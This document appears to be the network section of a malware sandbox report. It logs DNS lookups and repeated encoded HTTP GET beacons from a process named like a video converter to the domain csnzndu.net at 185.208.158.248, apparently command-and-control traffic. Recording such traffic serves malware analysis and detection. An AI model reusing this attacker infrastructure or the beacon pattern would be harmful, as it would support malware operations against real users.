                                                                          Oct 7, 2024 13:28:31.992135048 CEST5003980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:28:31.997232914 CEST8050039185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:28:31.997313976 CEST5003980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:28:31.997486115 CEST5003980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:28:31.997617006 CEST8050038185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:28:31.998496056 CEST5003880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:28:32.002532959 CEST8050039185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:28:32.694250107 CEST8050039185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:28:32.694555998 CEST5003980192.168.2.7185.208.158.248
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 7, 2024 13:26:27.892508984 CEST6139353192.168.2.71.1.1.1
                                                                          Oct 7, 2024 13:27:24.707308054 CEST6297853192.168.2.791.211.247.248
                                                                          Oct 7, 2024 13:27:24.742336035 CEST536297891.211.247.248192.168.2.7
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 7, 2024 13:26:27.892508984 CEST192.168.2.71.1.1.10xdcccStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                          Oct 7, 2024 13:27:24.707308054 CEST192.168.2.791.211.247.2480xf5dfStandard query (0)csnzndu.netA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 7, 2024 13:26:27.899292946 CEST1.1.1.1192.168.2.70xdcccNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                          Oct 7, 2024 13:27:24.742336035 CEST91.211.247.248192.168.2.70xf5dfNo error (0)csnzndu.net185.208.158.248A (IP address)IN (0x0001)false
                                                                          • csnzndu.net
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.749971185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:25.784905910 CEST318OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c0ef919f3a HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:26.512285948 CEST500INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 31 32 34 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 33 34 36 61 63 37 30 66 65 37 39 61 62 33 37 35 33 64 65 66 66 64 34 30 30 63 61 34 36 63 64 37 64 62 62 31 33 66 65 32 64 38 38 32 37 65 30 30 65 61 37 36 33 63 32 34 64 62 39 65 31 34 38 65 37 35 39 37 66 34 33 65 63 32 66 36 36 39 64 33 65 37 39 38 66 66 62 31 30 64 65 65 39 39 36 38 34 33 32 63 37 36 63 39 36 31 36 64 38 34 36 64 65 36 66 66 32 30 31 64 63 62 35 30 30 37 36 62 34 32 35 64 66 65 62 32 38 66 63 63 62 62 37 62 61 30 61 62 37 37 64 38 61 31 62 32 33 30 66 30 36 37 66 62 30 37 65 37 66 30 61 36 33 62 32 65 38 38 62 66 62 38 64 32 34 35 38 65 33 36 63 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 12467b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07346ac70fe79ab3753deffd400ca46cd7dbb13fe2d8827e00ea763c24db9e148e7597f43ec2f669d3e798ffb10dee9968432c76c9616d846de6ff201dcb50076b425dfeb28fccbb7ba0ab77d8a1b230f067fb07e7f0a63b2e88bfb8d2458e36c0
                                                                          Oct 7, 2024 13:27:29.131093025 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:29.381908894 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.749973185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:29.508670092 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:30.195314884 CEST355INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 39 34 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 62 32 32 65 66 37 64 35 62 61 64 37 35 66 36 36 63 61 38 33 62 35 30 64 65 66 66 64 37 30 39 64 65 34 35 63 65 36 33 62 39 31 61 66 63 33 33 38 61 32 36 64 34 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 9467b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1b22ef7d5bad75f66ca83b50deffd709de45ce63b91afc338a26d40


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.749975185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:30.322818041 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:31.003869057 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Oct 7, 2024 13:27:31.112714052 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:31.352433920 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.749976185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:31.477395058 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:32.179398060 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.749977185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:32.308736086 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:32.989496946 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.749978185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:33.118685007 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:33.834141970 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:33 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.749979185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:33.974112988 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:34.648974895 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.749980185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:34.908236980 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:35.606448889 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:35 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.749981185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:35.734334946 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:36.432707071 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:36 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.749982185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:36.558089018 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:37.246624947 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.749983185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:37.371253014 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:38.070269108 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.749984185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:38.286283970 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:38.989340067 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Oct 7, 2024 13:27:39.098804951 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:39.342717886 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.749985185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:39.469279051 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:40.180392981 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.749986185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:40.313858032 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:41.175564051 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.749987185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:41.306924105 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:41.991182089 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.749988185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:42.284077883 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:43.154154062 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.749989185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:43.275840044 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:43.981005907 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.749990185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:27:44.108683109 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:27:44.876364946 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:27:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
